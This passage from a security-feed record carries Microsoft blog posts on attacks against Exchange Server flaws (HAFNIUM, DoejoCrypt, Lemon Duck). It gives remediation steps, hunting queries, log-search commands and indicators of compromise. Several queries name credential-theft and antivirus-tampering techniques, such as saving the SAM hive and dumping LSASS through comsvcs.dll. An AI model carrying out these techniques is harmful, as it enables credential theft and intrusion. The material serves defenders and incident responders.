successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mssecure", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * 